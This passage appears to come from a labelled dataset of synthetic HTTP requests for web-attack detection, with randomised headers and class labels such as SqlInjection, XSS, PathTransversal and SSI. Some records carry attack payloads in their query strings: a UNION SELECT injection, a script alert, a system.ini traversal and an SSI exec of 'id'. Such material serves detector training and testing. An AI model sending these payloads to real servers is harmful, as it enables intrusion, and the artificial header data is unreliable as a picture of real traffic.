Date: Thu, 16 Jul 09 18:39:44 CET
ETag: W/"kIs-QqYDbLDJ8MmpxE"
Expect: 100-continue
From: dce3hsp@34tobzetrq.fr
If-Modified-Since: Thu, 18 Sep 08 10:08:03 CET
If-Unmodified-Since: Tue, 21 Dec 04 14:28:40 UTC
If-Match: "_Izm4xKtl.Xnnh24E5mY"
If-None-Match: *
If-Range: Wed, 18 Jan 06 20:47:38 CET
Max-Forwards: 064
MIME-Version: 7.7
Pragma: ta=bd
Proxy-Authorization: mfey smnSW=fltvk
Authorization: Digest nonce
Range: 2403-,12114-9,53-40810
Referer: /eClmgrT.mp3
TE: deflate;q=0.9,gzip,trailers
Trailer: TE
User-Agent: Mozilla/2.5 (X11; U; Unix 1.2; me-9n; rv:8.2.7) Gecko/35157727
UA-CPU: 68000
UA-Disp: 1503,1276,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 953x846
Via: FTP/2.5 101.172.107.225, HTTP/2.0 www.aet0wiat.html
Transfer-Encoding: lauvse; eychmig=l1athgp
Upgrade: pIh6l/8.2, tEst/3.2
Warning: 931 29.33.161.132:937 "tiriHq" "Sun, 23 Apr 06 11:58:11 UTC"
X-Forwarded-For: 195.218.20.4
X-Serial-Number: 3512760212193
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43213
Start - Id: 42577
class: SqlInjection
GET /ezIoh2ue/locationbevalaMwGUw6e/tdsHlss/bU9tqtrIANEBUub4/gWv1.mspx?rt=6556&mdftnocn=y%7E7aho%3B+rnm+rIr&ebjwBfRxm3Sbetween=%27+++++UNION+++++++++ALL+++++++++++SELECT+++++htmM4gy++++FROM+li+++WHERE+++++%27%27+++%3D++%27&e6ta=aneeW%5D HTTP/1.0
Host: www.g360rd.com
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: IexDEdn-7cdsthx;q=0.7
Cache-Control: min-fresh=59
Client-ip: 8.53.51.76
Cookie: lgkalOkgfrteI=leBLnoesewll8citg;sjehhitXdty=252531428;TN1kfr.QayG=EI
Cookie2: $Version="6"
Date: Wed, 14 Nov 07 08:39:38 CET
ETag: "AIbTkMC-@CHeNXLDldey"
Expect: wshtlUla
From: tmTstilr@oerx.it
If-Modified-Since: Mon, 01 Jan 07 20:59:12 UTC
If-Unmodified-Since: Sun, 01 Jan 06 24:54:21 GMT
If-Match: "Bj0wV@kwatKawSkqVcj-"
If-None-Match: *
If-Range: Mon, 23 Aug 04 03:16:17 UTC
Max-Forwards: 670
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Basic Nm9UYWV3c3I6bmUzYQ==
Authorization: Basic SGRva2VoOmw4bzNqaQ==
Range: -327,463619-533,09-501926
Referer: http://www.Nwwoii.ch/rdFsq/rARnviat/hsniti.php3
TE: trailers
Trailer: From
User-Agent: Mozilla/3.7 (Machintosh; U; PPC Mac OS X 1.9; ie-ar; rv:4.3.6) Gecko/18128589
UA-CPU: MIPS
UA-Disp: 8242,0192,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 161x8196
Via: 2.1 www.tstou.shtml
Transfer-Encoding: Asgn
Upgrade: lxiev/4.8, Sc4/5.2, owd/0.5
Warning: 740 www.flc6.js "aobefTi4oh6lxaa" "Sat, 01 Jul 06 04:47:36 CET"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 81684
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42577
Start - Id: 39041
class: LdapInjection
PUT /bian7eio2/nanjhbtdmc/s6owY2QltpyCEIBOPm/esnoreacn/er/5cOyU3eno7a/vedsaszRs/mzoosc/utEYm07h5eEhe/dnoES1tKve7nlcrrt0/yn/eVP162cjoJVE.html? HTTP/1.1
Content-Length: 185
Content-Language: drntfij
Content-Encoding: compress
Content-Location: /o5eddao/iokamoyr/oayn9q/Aomu.php3
Content-MD5: ZnB3YUFyZWRvc3NlTHBhZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 25 Dec 05 17:18:49 UTC
Last-Modified: Wed, 16 Feb 05 04:59:24 GMT
Host: 96.97.178.254:80
Connection: cTdrtmfk
Accept: video/*;q=0.7, image/jpeg, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 59.124.216.176
Cookie: estg=3;3oodhlNr=nep;aceeesacsoaeg=ver3ooeol|i;iieg4ssa=wfe7rqrp
Cookie2: $Version="6"
Date: Mon, 23 Mar 09 03:29:15 UTC
ETag: "uT3zZbW3UQjDV7lpt3"
Expect: 100-continue
From: n1eboh@st19rPen.org
If-Modified-Since: Sun, 05 Aug 07 21:08:21 CET
If-Unmodified-Since: Fri, 03 Feb 06 10:36:49 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 755
Pragma: no-cache
Proxy-Authorization: Digest uri=http://ohSun.cz/jfd5ocqe/z1nbbi1/pdriaah.zip
Authorization: NTLM bG5obGlpMWVhdWVMa3lOa2FpeGRpemRNazhzZnVoZHF5dA==
Range: -4
Referer: http://rttedetY.cz/Tabrioer/Whev.jsp
TE: gzip;q=0.9,chunked;q=0.7,trailers
Trailer: If-Modified-Since
User-Agent: )  ( | (nueiq=siop*)
UA-CPU: MIPS
UA-Disp: 720,158,16
UA-Color: color32
UA-Pixels: 183x5946
Via: FTP/3.1 www.alnEee.js
Transfer-Encoding: Fpee
Warning: 184 201.174.35.89:741 "pn1en0ohpElcexnsIrn" "Tue, 06 Jun 06 13:35:25 GMT"
X-Forwarded-For: 171.193.236.131
X-Serial-Number: 8237003148832
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~

kw=oocic9&ebsrnen=heiLeT&yevalaxtmS=eBoja6viy5&if=a+:sefrn&rIk21iaetrIe=636&aasoenSewrr2=nlinkilh<3jhc&dce=m e&atH3w=beauTiGih6lL~2ls&_few2LKgE5rz=Rahe&mnksltd8tiCzrps=469874365

End - Id: 39041
Start - Id: 32636
class: Valid
PUT /msoHgrenStgschn/TH5Oc7aOU4gBF/K9lftp-perloRadminGfhGo/yGmTrWkE9Eu93l/red00nb/hFQYnKmYDbgsound/od0aaodDoygg/irnleb9rmsfn/I4kSHq66Ea/thnae.jpeg? HTTP/1.0
Content-Length: 147
Content-Language: bxrpn
Content-Encoding: identity
Content-Location: /0Uaf/h0cmbme/IntfroU/koCe98i/smtsesw.htm
Content-MD5: cnJldHJzdGVxbnR5b2hpYw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 01 Sep 09 04:12:26 UTC
Last-Modified: Mon, 01 Mar 10 08:51:47 UTC
Host: 170.159.58.7
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: identity;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 139.120.203.64
Cookie: rlacropTns=e ne;AZotmp9isI6u=oIztl<ui |r%e(%te
Cookie2: $Version="643"
Date: Sat, 09 Feb 08 13:28:28 CET
ETag: "mIeVAW7NphVBy_S"
Expect: htOEAnxm
From: ueoto@th0yt1ahea.uk
If-Modified-Since: Thu, 07 Jul 05 08:17:13 UTC
If-Unmodified-Since: Fri, 22 Oct 04 12:08:33 CET
If-Match: "7h5KAshypDD5_vJ24"
If-None-Match: *
If-Range: *
Max-Forwards: 906
MIME-Version: 8.6
Pragma: 8=4o0eocra
Proxy-Authorization: Basic b25ycnE6OWxwZ2dl
Authorization: Basic Z25naGM6ZXcxZXR0Mg==
Range: -8365,-00217
Referer: /hcmT/lqwpxnr0.asmx
TE: trailers,gzip;q=0.9,deflate
Trailer: Cache-Control
User-Agent: tsdus2m
UA-CPU: PowerPC
UA-Disp: 530,9577,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 853x924
Via: 4.2 228.147.251.150, 5.7 www.cJaosg.gif, FTP/2.6 www.1eb8h.jpeg
Transfer-Encoding: compress
Upgrade: ynt1h/8.2, ngs7ii/4.5, emia/0.6, hboy/6.2
Warning: 960 www.0iBqm.htm "egimmrwtfsoosti" 
X-Forwarded-For: 118.148.230.191
X-Serial-Number: 14198779071
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

er8imgPoxuawwe=6988&einbJ=85&RcTlnd=0851&TlwxE=vrcecopya@mipo&utra2i9buAlP7=utt8&owfmpv=8oocxo1tam&sr=i0euAR4Ifcqx&toiyeSaatqlmbI=A9e t+6go2 th

End - Id: 32636
Start - Id: 47281
class: XSS
GET /iitsa/nzteEasle/Bctelnetechou@.swf?0iaf=9%40.l%40&rsi4i8sdl=nisobermara7voci&uftan=4020470884&etadsiaic=%3Cimg++++src%3D%26%7B%5Balert++%28%27ow%27%29%3B%5D%7D%3B++++%3E HTTP/1.0
Host: www.ciohe6rvwt.com:83750
Connection: chea
Accept: */*;q=0.5
Accept-Charset: x-mac-hebrew;q=0.5
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.0
Cache-Control: max-stale=56727
Client-ip: 48.5.47.91
Cookie: hjesnneac6=965106;is=7669071717;ihitD2zeaoyf7ea=uln?;sr=uShe2ttHNseso;5HfeoiEmdumpn1e=84
Cookie2: $Version="73"
Date: Fri, 23 May 08 21:18:51 UTC
ETag: W/"rXrXQIss2Diq7_2DXw"
Expect: eplnt
From: peTeu9@mayraae.fr
If-Modified-Since: Sat, 11 Oct 08 20:17:52 CET
If-Unmodified-Since: Thu, 26 Nov 09 01:38:15 UTC
If-Match: "C58REU7g@8XCzfnibj"
If-None-Match: *
If-Range: "fdxgrRwlfyB.BziEyE-"
Max-Forwards: 173
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM YWFmOHNyYThLaGRuZGhpbTRlRWVybmU5bnJGNWFveGNwbDli
Authorization: Digest nonce
Range: 3-25949,-0524
Referer: /tfeaeo/q8p1.swf
TE: deflate
Trailer: Upgrade
User-Agent: Mozilla/6.4 (X11; U; SunOS sun4u 8.7; hd-ob; rv:2.2.1) Gecko/96370493
UA-CPU: x86
UA-Disp: 3073,5344,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 581x8741
Via: HTTP/5.1 www.ltebddv.css, Tasc/4.6 246.234.226.165, FTP/7.0 88.33.70.47
Transfer-Encoding: deflate
Upgrade: mtnf/1.5
Warning: 047 125.243.221.59 "FolaPnotvWe1rchha" 
X-Forwarded-For: 135.30.4.5
X-Serial-Number: 972806638968754
----: ------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 47281
Start - Id: 23721
class: Valid
GET /dTqaKIAX-.shtml?is=hattSis&mobiwlepRouark=eNVO&eta9iSebioa=dnfagecsw6&hx=t0Ia_fsRE%40N HTTP/1.0
Host: 98.0.45.164:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 232.149.111.235
Cookie: Rguooaiyr6u=v.O;k2braop=64376615;tOd=cauRm;uda=eaiohiAh24ps&d aijnw;iDTnileMnds=68;oeaej7eB12=<EranMnw=eldgzt et
Cookie2: $Version="496"
Date: Fri, 13 Feb 09 07:09:02 GMT
ETag: W/"kb6e.IR6Q_h9Bn7yJ2"
Expect: syfohtr=idEz
From: SDcfto@h1dceuR3.cz
If-Modified-Since: Mon, 19 Nov 07 13:50:06 UTC
If-Unmodified-Since: Mon, 12 Feb 07 21:59:08 CET
If-Match: *
If-None-Match: ".nuvdGo14-zlQMGu.S7K"
If-Range: "wis_yEawDqXFN6FjmLs7"
Max-Forwards: 4298
MIME-Version: 4.4
Pragma: qsl=3
Proxy-Authorization: NTLM YTJ2Y2Vtc29wdGF1bWZlaWRtaGUxZmVvc2RvdHdnYUFpcg==
Authorization: ingo2N 9riaNhss=yUstnyi
Range: 88-,49-031,14468-474
Referer: http://Rbt0sny9.fr/wdepcan/izshm/saTr.pdf
TE: trailers,gzip;q=0.2
Trailer: If-None-Match
User-Agent: Mozilla/6.4 (Windows; U; Win98 0.8; n1-fw; rv:6.7.2) Gecko/73103777
UA-CPU: Sparc
UA-Disp: 807,314,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 431x276
Via: HTTP/9.1 www.6t0ym7.jpg, 8.6 169.3.119.109, 3.0 www.netann0.htm
Transfer-Encoding: gzip
Upgrade: Oias/7.2, yee/0.3
Warning: 169 20.110.71.138:174 "Xuulgeai2thhnsm" "Tue, 19 May 09 22:55:23 CET"
X-Forwarded-For: 204.159.198.225
X-Serial-Number: 13224
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 23721
Start - Id: 24909
class: Valid
GET /e9itVtosaswiI4/h-KYh/hsZ_sR1K/tfvR/int8se53iemtewmaSol.php3?nyteb=on&ticlq7r=09747&IobjectB3=odIi7dncqadmnx&nhm9tzefoirlv=6&r6reks=mailaxEEne+wgetm&qF4Cd-cV=gP8F7Qzz45Y&eneoY1d=3&ojtoeppdrll=b&prio2hta4fadH=722267879&sen2eanu=eY7THdG4AP-&7ehAsD=lB.k8oOl0.KM HTTP/1.0
Host: 137.174.147.225:231
Connection: close
Accept: */*;q=0.4
Accept-Charset: x-mac-arabic, iso-10646-ucs-2;q=0.3, cp-932
Accept-Encoding: 
Accept-Language: sn8fkl-mry, mreioT-etayr;q=0.9, spqahti3-ps
Cache-Control: no-transform
Client-ip: 119.122.46.193
Cookie: a8oaeln=cdQ;Rdr=6te~;ehltrosink=8073
Cookie2: $Version="9"
Date: Thu, 08 Sep 05 02:51:31 CET
ETag: W/"@PFwuy_CDfc9Wn35@u@N"
Expect: 0diAIo2=iagel
From: pwmfp9h@tptOa1oce.de
If-Modified-Since: Sat, 22 Aug 09 07:04:45 CET
If-Unmodified-Since: Wed, 03 Feb 10 13:02:29 CET
If-Match: "YDXh0ILPGKqk59p"
If-None-Match: "Fb4otu9cWHZ6GKiHvk"
If-Range: Tue, 06 Jun 06 14:30:19 UTC
Max-Forwards: 613
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest opaque="nodeiar"
Authorization: Basic MmV3czVzdXM6dGZzY3BlYQ==
Range: -19,-61236
Referer: /g2EjQo/hstt/stnc.css
TE: deflate;q=0.4,trailers
Trailer: If-Range
User-Agent: S5lsrthee (cK9o2.W@; sjYdoAq; n72zSN; jWJn7Z-Y)
UA-CPU: MIPS
UA-Disp: 575,252,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 404x3241
Via: 4.7 65.55.207.247
Transfer-Encoding: uu3tjn
Upgrade: sur/1.8, znripg/6.2, halyeo/7.1, osto/6.9
Warning: 183 238.92.156.51 "hdeD1us6xXiS0zlurs" "Sun, 02 Jan 05 14:53:03 GMT"
X-Forwarded-For: 45.246.59.205
X-Serial-Number: 5477334
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24909
Start - Id: 21367
class: Valid
GET /waiqod5ghpIcrrNa/ji/rsrad/eei9ceda14e2shoe49/in1/ab/tfAX4_p/formB@CWN5B/jIC-.nsf?ie=e+t4e5%3Af HTTP/1.0
Host: 201.27.65.245
Connection: oqbyteo
Accept: image/gif;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: identity, compress, compress;q=0.7, deflate
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 83.209.43.203
Cookie: 8VWwf90tA=941488619
Cookie2: $Version="03"
Date: Fri, 09 Feb 07 09:23:46 UTC
ETag: "NH-4d06ZBYMuVX6"
Expect: nnts9sl=eerczEea
From: erbhednr@ieSiief.com
If-Modified-Since: Sat, 24 Feb 07 20:02:01 UTC
If-Unmodified-Since: Sat, 31 Oct 09 21:37:36 GMT
If-Match: "Zs-bhpV5DYnyienhAx"
If-None-Match: *
If-Range: "tKjivUtX4KBrlnF1jLo"
Max-Forwards: 263
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: sd82P eTmcdJwb=iacdS
Authorization: NTLM Qzd2ZWphZDNwaHB0ZGV6N2N5eXRodG5oaW95bWUwY2h5aXJhZ3NvVHlkdXJs
Range: -510,-15,91865-958
Referer: http://www.blto.ch/trnia/lsydtox/6OiS3c/tyud.php4
TE: trailers
Trailer: Accept-Encoding
User-Agent: kih5rjswhl (p9hPztXc; aSM-khjAhS; rD0UMQ@p)
UA-CPU: x86
UA-Disp: 3983,8389,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 945x442
Via: HTTP/8.4 200.135.252.105, gnm/1.8 139.1.193.133
Transfer-Encoding: deflate
Upgrade: rhr/1.3, Smen/4.8, iZ2/9.9, 9env/2.8
Warning: 104 201.244.255.0 "TtHe7ldEfrh" "Sun, 27 Jan 08 03:21:34 CET"
X-Forwarded-For: 86.182.5.47
X-Serial-Number: 2418413
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21367
Start - Id: 34662
class: Valid
PUT /newkabjev@tz/autoexecL-3V/nErLEyxFsieRWC@/M0zxyjN_-@/nPUAulzw-HVQi/@ge3IJA%ulike1/X1JxgO_xmlo/o1epM9drinechuibv/lont/m-Tq3fF4s4Lw0W/tTexWbJ1FAX1w/jf.html? HTTP/1.0
Content-Length: 230
Content-Language: idtzsi,a
Content-Encoding: compress
Content-Location: http://e6towrvR.com/aaiab.gif
Content-MD5: c2xCYW9maWZSdHNzaXZxaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 21 Mar 09 01:56:19 CET
Last-Modified: Sun, 05 Feb 06 21:28:17 UTC
Host: 175.191.22.82
Connection: close
Accept: */*
Accept-Charset: windows-1252;q=0.9, iso-8859-9;q=0.9, windows-1251
Accept-Encoding: 
Accept-Language: i3-c, m3EOrie-paNaocg;q=0.1, 3sxtsCd-22odts;q=0.3, Eeelar-tzO6eBtj;q=0.2, alrrlan-idgee
Cache-Control: no-cache
Client-ip: 7.17.239.44
Cookie: enar=7217628;herlshvsnr=yntde
Cookie2: $Version="20"
Date: Fri, 29 Dec 06 24:39:07 UTC
ETag: W/"jCZVPOgYrE4zGAxr"
Expect: 100-continue
From: ollao@ehcaufe.uk
If-Modified-Since: Wed, 17 Jan 07 13:12:18 CET
If-Unmodified-Since: Fri, 05 Nov 04 12:40:29 CET
If-Match: "KG2OGwoAeTg9Jp28"
If-None-Match: *
If-Range: Thu, 27 Jul 06 14:44:05 UTC
Max-Forwards: 470
MIME-Version: 8.8
Pragma: io=Ni
Proxy-Authorization: NTLM OUVlZWVpbXBtc3Q5bnRyeGFpdTFuaXhobmRiY2d3cnhuYVd0aGJXZWluZg==
Authorization: NTLM bjVkeGhhYWFsaWdhc0NkZXRybnRlNXVpQTJhbVRpc3RhMWpyTm5jaXRy
Range: -31378,040524-,4380-77
Referer: /iiyydc.bin
TE: trailers,gzip;q=0.9,deflate
Trailer: Connection
User-Agent: etonm29rgm/7.3
UA-CPU: PowerPC
UA-Disp: 379,2037,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0894x8053
Via: eqy/0.4 www.feisdFas.png, FTP/0.8 www.fp0at.htm
Transfer-Encoding: identity
Upgrade: Pxo/5.2, ieHso/7.8
Warning: 733 216.211.74.150 "ooEn" "Thu, 08 Apr 04 01:54:11 GMT"
X-Forwarded-For: 139.243.218.142
X-Serial-Number: 80315
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cav3nEtR3s0dhuu==&agIl=obVwvYmmVbU&nDoa=795&sC0ahjh=Olh7&oah= n&tclJm=&]vnTyhaimT&sOa6nttlrhaerE=3OF5h&sgejhAurteedN=d@d&zZLGrYyRphpO=nodeeO&mD1MSG9y=uUf2&oLLo=Et&mlkeqrtfhQerls2=64749923&hla4djfr=r&atHidefb72v=m1Y9p9odmei

End - Id: 34662
Start - Id: 45472
class: PathTransversal
GET /eJN/BEhaving@3m_access_log2VWhT/aGuhehhrS2nabob/S@IW.KWU/twlAesstz/tzdpWiael3t.html?iemHtbhFqtissn=85611209&sfromamochaJ=aWtlUS01%404&zeubcrtejia=9ebR4&usgnoyr3r=t%40ii&TIbiafa=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&roNrxm=bs&tYnnbcrtorh=gae&QymrimhnrsoyeoM=p5oT&owaemvweid6=aWpMog HTTP/1.0
Host: www.Oa0tdl.de
Connection: nco5
Accept: application/*, video/*;q=0.5, video/mpeg;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: rlz-Nu5n;q=0.5, huula-fne5;q=0.1, 3iWmls-z1jpdU;q=0.5, gxsneosA-cdae, p-aTp
Cache-Control: no-cache
Client-ip: 172.157.36.227
Cookie: asdntprsrru=se
Cookie2: $Version="810"
Date: Fri, 20 May 05 12:31:37 GMT
ETag: "gbDOmC@O10HWIKffXP"
Expect: 100-continue
From: 9lho@aiRe.net
If-Modified-Since: Sun, 25 Apr 04 14:15:54 UTC
If-Unmodified-Since: Sat, 18 Oct 08 06:54:53 GMT
If-Match: *
If-None-Match: "cNBHtsEym-L7@39G"
If-Range: "b@ZGNKyKVgff-0Kbr73"
Max-Forwards: 72
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest algorithm=ohi4
Authorization: Digest cnonce="dlear"
Range: 934-,6-,-7
Referer: /ruGee.swf
TE: trailers,gzip;q=0.2
Trailer: Referer
User-Agent: riTbseers/7.6
UA-CPU: x86
UA-Disp: 8084,8855,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5163x468
Via: 5.5 www.rgfqNoac.html:0
Transfer-Encoding: compress
Upgrade: drf/1.3, eoe/9.9
Warning: 126 www.bm57.shtml "tust8ovdsrl" "Tue, 15 Jan 08 10:20:10 CET"
X-Forwarded-For: 150.175.159.37
X-Serial-Number: 49844
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45472
Start - Id: 26983
class: Valid
GET /ecz2bnVAVk/er1ereso8nse9jl/iu/esbl6oeu/Tnef/9bC-jpvopo/cYidDemeyp/EQconnectJphphtpassfaBWkoGN/oCEv/rtscgiqacIeusa.gif?m35hu70yni=873202 HTTP/1.0
Host: 75.211.156.191:489
Connection: close
Accept: audio/basic, application/*;q=0.8, audio/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 128.148.23.146
Cookie: eos=Aystdini;dOe5w5gaao=96
Cookie2: $Version="48"
Date: Tue, 01 Mar 05 05:14:36 GMT
ETag: W/"ZRNduEirGmna_BUVr"
Expect: sh6l=tpbiednd
From: eanp0se@1atltaa.biz
If-Modified-Since: Fri, 14 Dec 07 23:12:23 CET
If-Unmodified-Since: Wed, 21 May 08 14:20:28 UTC
If-Match: "M0QsBbLnB6zW2p1@Y"
If-None-Match: *
If-Range: Thu, 23 Apr 09 21:25:11 CET
Max-Forwards: 9
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest uri=/biqENYth/edeooS/chbcKuvl/4rinantn.jsp
Authorization: Digest uri=http://1ooitc.it/pgat9al/rGh6zr.doc
Range: -522653
Referer: /8elanreo/I9eopw/ruetil.cgi
TE: gzip;q=0.2
Trailer: Accept-Charset
User-Agent: qLgelcdeo/5.6.2.9.3
UA-CPU: Sparc
UA-Disp: 181,245,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 6860x985
Via: 5.5 58.242.170.132, HTTP/3.6 www.emEeoaNy.gif
Transfer-Encoding: 7tne6z
Upgrade: n2et/1.1
Warning: 634 119.210.230.98 "Etrefi" "Thu, 26 Oct 06 17:47:14 CET"
X-Forwarded-For: 126.84.101.124
X-Serial-Number: 781010344531
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26983
Start - Id: 40003
class: SSI
GET /fDbto7lqSi/tRIPnf@FvDioVZF@Tv@/39tetaaolRtidemis/s6shutdownnull8Bj/ahYEswoo/2i4ehRggE/hr3eolmdTnugk5ye9nts/eo1.css?eApotooW=%3C%21+%23%3C%21--+++%23exec+++cmd%3D%22id%22--%3E&a7d=ween HTTP/1.0
Host: www.tmjaTbd.net
Connection: Uh4feei
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.0
Cache-Control: min-fresh=38678
Client-ip: 166.189.125.177
Cookie: astspsa=iv7Q@tiul2o_
Cookie2: $Version="4"
Date: Fri, 24 Apr 09 12:30:33 UTC
ETag: W/"yDGjnJnSi2OEj@O9zPi9"
Expect: si3i=ayrD2qe
From: atetgwlh@rphs.com
If-Modified-Since: Thu, 18 Feb 10 08:40:15 CET
If-Unmodified-Since: Sat, 23 Oct 04 08:00:14 UTC
If-Match: "_L0zjhLz3uS67inl"
If-None-Match: "3cWZDBWeMpko2kshKZO"
If-Range: Wed, 20 Apr 05 10:01:30 UTC
Max-Forwards: 24
MIME-Version: 5.0
Pragma: st='Ag'
Proxy-Authorization: Digest qop=auth-int
Authorization: ycset sriu=ednC
Range: 324240-02
Referer: http://axssodha.org/kedtrhI/heonkr4/g0mgafl/9tna.sh
TE: trailers,trailers,deflate;q=0.4
Trailer: If-Match
User-Agent: Mozilla/0.0 (X11; U; Linux i386 6.3; up-tq; rv:5.8.9) Gecko/96908714
UA-CPU: Sparc
UA-Disp: 2956,4144,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 860x1351
Via: FTP/8.2 221.151.74.10, HTTP/4.0 www.hnsHa.jpeg, HTTP/7.2 160.153.35.253
Transfer-Encoding: deflate
Upgrade: iNatOe/5.8, 1TIi/6.0, rrnz/0.3, ale/7.7
Warning: 490 www.nelmaze.html "8xbzssdeyA" "Sat, 13 Jan 07 10:11:05 GMT"
X-Serial-Number: 18116
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40003
Start - Id: 12641
class: Valid
GET /i6i/oT-SG3MJi-y/r0Q3_2CxaVeQ/seke.exe?syT8e9msetaOubd=n&ohwtfmcse=4262723446&gauAevccraase=867&eunt=iar+s&0sPxtl=tu&No1cN-vhtpassxElinkE=ykz%7Cz%29%283y&JPd.h=43&vE=tl&ae=t&nrt=tE&DfaOgci2rgrNhe=615 HTTP/1.0
Host: 142.208.210.137
Connection: keep-alive
Accept: image/png, text/*;q=0.1, video/*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 3.109.171.118
Cookie: ieirwpjlnnol3h=0Lp4@acseienn ;htnnoforta1laAy=ciaety638i
Cookie2: $Version="468"
Date: Tue, 27 Sep 05 08:06:13 GMT
ETag: "ILjtpDyTG.YEsm1"
Expect: 100-continue
From: e9hfirse@Sgst2t.uk
If-Modified-Since: Tue, 04 Aug 09 06:06:34 CET
If-Unmodified-Since: Mon, 19 May 08 18:05:41 UTC
If-Match: *
If-None-Match: "0fMBWsSHesIVUJaLq2S"
If-Range: "2VhF8RWWIq-p4hrJAdE"
Max-Forwards: 609
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: NTLM czZpaW90N29vZE80aGlsd3RScElhRGZ2ZWlhM3M2Zk5kc0k4SWQ=
Authorization: NTLM RG5pMHRHb3RvaHNpVWxkbXBEcmVzcWlhdmVlbHNzdnRuTGw=
Range: 351-,8925-
Referer: /Creu/Ts46sjEl/doeyiow/eRaP7/pshdeqto.jpeg
TE: trailers
Trailer: Range
User-Agent: Mozilla/0.3 (Machintosh; U; Mac OS X 6.3; 64-81; rv:0.1.2) Gecko/59154430
UA-CPU: x86
UA-Disp: 3446,218,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 961x7915
Via: 4.6 www.Eitton.gif, wlupdb/0.3 52.19.185.243
Transfer-Encoding: gzip
Upgrade: njK/4.3
Warning: 878 www.methfIu6.shtml:3151 "nNahahgcBlhteopkei" "Thu, 29 Nov 07 02:46:46 UTC"
X-Forwarded-For: 107.120.142.45
X-Serial-Number: 67342985693
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12641
Start - Id: 2582
class: Valid
GET /osT-166h7EFvSFZSvQ/imoctSf4rexek/ohS9GLHOBji8E.html?iriosrprc4wk=3pghyihi&wit8igvstemn=39&lilotNz1shtusm=attn+%3Ea%3Bexe5riframei%7E&hunnoeoeii8die=qodra7qWStse+e&naem=swsf+ehelsop&tkn1dde=348800&pB3eno=tJDD6nsoXp&jebinAn=eBH0yn&locationsuV3_.scriptgmD=826527&aTEN6t=ooRAsoeeEenltr&dw=drt4Gteoium&tleleCnce38ine=t%3Ber HTTP/1.1
Host: 108.65.97.192:37283
Connection: endi3
Accept: */*;q=0.1
Accept-Charset: x-mac-arabic, windows-1251;q=0.2, us-ascii, cp-936, windows-1258;q=0.4
Accept-Encoding: *;q=0.7
Accept-Language: lsOi-ns, Ne-nihmT
Cache-Control: only-if-cached
Client-ip: 55.106.123.246
Cookie: llplyE=60;hlib.dyvn=xp_;esn3j=a7lgpfoH2e'r;eI6paNneNm=gw
Cookie2: $Version="64"
Date: Sun, 22 Feb 04 21:27:08 GMT
ETag: W/"VIXU5KySQEy1khxcK0P"
Expect: 100-continue
From: nenonte@ily8ueedor.uk
If-Modified-Since: Tue, 06 May 08 05:53:30 UTC
If-Unmodified-Since: Thu, 25 Feb 10 04:00:17 GMT
If-Match: "1dh8LBFTdAGRG6Do"
If-None-Match: *
If-Range: Sat, 19 Jun 04 14:56:21 UTC
Max-Forwards: 49
MIME-Version: 4.9
Pragma: no-cache
